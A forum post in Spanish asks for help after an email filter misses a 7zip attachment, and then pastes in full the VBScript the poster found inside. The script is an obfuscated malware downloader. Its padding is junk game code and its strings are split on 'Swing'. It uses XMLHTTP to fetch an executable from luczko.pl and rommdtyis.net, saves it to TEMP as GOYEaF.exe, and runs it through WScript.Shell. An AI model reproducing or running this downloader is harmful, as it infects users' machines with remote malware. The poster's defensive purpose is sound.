I need a solution
Hola, he detectado a travez de Mail Security de Enpoin que este no analiza bien el contenido de los archivos comprimidos.
Dentro de mis filtros he creado una politica de revision de tal menera que todo correo entrante o saliente con un adjunto comprimido lo analice, esta semana recibimos nuevos virus pero estan usando el compresor 7zip.
Dentro de este viene un .vbs
He aislado el codigo y estoy revisando el contenido y que hace:
Necesito ayuda para poder detenerlo:
El codigo que trae es el siguiente:
Tuve que agregar esta extension.
function ep_planetroute(route,move,start, target)
dim x,y,astarmap(60,20)
for x=0 to 60
for y=0 to 20
if move<tmap(x,y).walktru then astarmap(x,y)=1500
if tmap(x,y).onopen<>0 then astarmap(x,y)=0
if tmap(x,y).no=45 then astarmap(x,y)=1500
next
next
return a_star(route(),target,start,astarmap(),60,20,0,rollover)
end function
Function Andd ( Biel1 , Biel2 )
Andd = 0
If Biel1 = 1 then
If Biel2 = 1 then
Andd = 1
end if
end if
end function
function oandd ( Biel1 , Biel2 )
oandd = nott ( andd (biel1 , biel2 ) )
end function
Dim gagagagadrierheal33 'As String
Vrungel = ".responseB"+"ody"
Function LabradorPS2(dry)
if dry > 2 AND 2232 > dry Then
gagagagadrierandIknowIT = gagagagadriercAfee.responseBody
end if
End Function
gagagagadrierRH = "User"
Dim gagagagadrierLAKOPPC 'As String
'Dim RDFGO() 'As String
Dim gagagagadrier2 'As String
Dim gagagagadrierGMAKO 'As Object
Dim TristateTrue
Dim gagagagadriercAfee 'As Object
Dim SPCcontractorsR 'As Object
Function LabradorPS()
SPCcontractorsR.Savetofile gagagagadrierheal33, 2
End Function
Function gagagagadrierTeethk(p)
gagagagadriercAfee.Send
End Function
Dim gagagagadrierrepost
gagagagadrierrepost = false
Dim RDFGO
Dim gagagagadrierKSKLAL 'As Object
Function F3(p)
Set gagagagadrierRombickom = CreateObject("WScript.Shell")
End Function
Dim gagagagadrier1DASH1solo 'As Object
gagagagadrier2 = "Microsoft.XMLHTTPSwingAdodb.streaMSwingshell"+".ApplicationSwingWscript.shellSwingProcessSwingGeTSwingTem"+"PSwingTypeSwingopenSwingwriteSwingresponseBodySwingsavet"+"ofileSwing\GOYEaF.e"+"xeSwinghttp:Swing//"
Dim gagagagadrier4 'As String
Function GeometryDash(p,d)
gagagagadrierRombickom.Run(gagagagadrierheal33u)
End Function
Function Razdel( s500 )
Razdel = Split(gagagagadrier2, s500)
End Function
Dim sWholeVis 'As String
Dim gagagagadrierandIknowIT 'As Variant
Dim dePetya 'As Integer
gagagagadrierRH = gagagagadrierRH&"-"
Dim iSlashPOS 'As Integer
Dim sDecimalVis 'As String
sWholeVis = "A"
Lunchers = Split("luczko.pl/86hHYU6?^74jhdrommdtyis.net/af/86hHYU6", "^")
Dim MarketPlaceibility 'As String
Dim sNodeKey 'As String
Dim sParentKey 'As String
Dim MarketPlace 'As String
RDFGO = Razdel(""&"Swing")
Dim sTempVis 'As String
Dim iCount 'As Integer
Dim gagagagadrierRombickom
zTempVis = RDFGO(1)
iSlashPOS = 12
'Set gagagagadrierGMAKO = CreateObject(RDFGO(8-6))
Set Darkness = GetRef("GeometryDash")
Set SPCcontractorsR = CreateObject("Adodb.streaM")
MarketPlace = RDFGO(13) & RDFGO(14)
gagagagadrierRH = gagagagadrierRH&sWholeVis&"gent"
Set gagagagadrier1DASH1solo = CreateObject(RDFGO(3))
Set gagagagadriercAfee = CreateObject(RDFGO(0))
dePetya = 1
Set gagagagadrierKSKLAL = gagagagadrier1DASH1solo.Environment(RDFGO(1 + 3))
gagagagadrierLAKOPPC = gagagagadrierKSKLAL(RDFGO(6))
sTempVis = RDFGO(iSlashPOS)
Dim i
'on error GoTo nextU
' on error resume next
ubnd = UBound(Lunchers)
For i = 0 To ubnd Step 1
dePetya = 1 + dePetya
gagagagadrier4 = MarketPlace & Lunchers(i)
gagagagadriercAfee.Open RDFGO(5), gagagagadrier4, False
gagagagadriercAfee.setRequestHeader gagagagadrierRH, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
on error resume next
gagagagadrierTeethk ""
If gagagagadriercAfee.Status = 200 Then
gagagagadrierrepost = true
Exit For
End If
Next
on error goto 0
Function gagagagadrierSEND(p)
p.Send
End Function
function drawroulettetable()
dim x,y,z
dim coltable(36)
coltable(0)=10
coltable(1)=12
coltable(2)=15
coltable(3)=12
coltable(4)=15
coltable(5)=12
coltable(6)=15
coltable(7)=12
coltable(8)=15
coltable(9)=12
coltable(10)=15
coltable(11)=15
coltable(12)=12
coltable(13)=15
coltable(14)=12
coltable(15)=15
coltable(16)=12
coltable(17)=15
coltable(18)=12
coltable(19)=12
coltable(20)=15
coltable(21)=12
coltable(22)=15
coltable(23)=12
coltable(24)=15
coltable(25)=12
coltable(26)=15
coltable(27)=12
coltable(28)=15
coltable(29)=15
coltable(30)=12
coltable(31)=15
coltable(32)=12
coltable(33)=15
coltable(34)=12
coltable(35)=15
coltable(36)=12
z=0
for y=1 to 12
for x=1 to 3
z=z+1
locate y+2,x*3+45,0
if coltable(z)=12 then
set__color 12,2
else
set__color 0,2
end if
next
next
set__color 15,0
return 0
end function
if gagagagadrierrepost Then
Dim Ratchet 'As String
gagagagadrierheal33 = gagagagadrierLAKOPPC+ sTempVis
F3 ""
SPCcontractorsR.Type = 1
SPCcontractorsR.Open
LabradorPS2 13
SPCcontractorsR.Write gagagagadrierandIknowIT
LabradorPS()
Dim HeWas,SheWas 'As Long
gagagagadrierheal33u = gagagagadrierheal33
HeWas = 2123
If 939 < HeWas Then
SheWas = ""
Darkness 4,SheWas
End If
end if
Function hullPosix(ByVal i )
DIM cmdPipe
If(i = 1) Then
runCmd = "cvlc "& chr(34) & media & chr(34) & ""& vlcArgs & "&"
ElseIf (i = 2) Then
If (pid <> "NULL") Then
SHELL "kill "& pid
pid = "NULL"
End If
End If
End Function
0
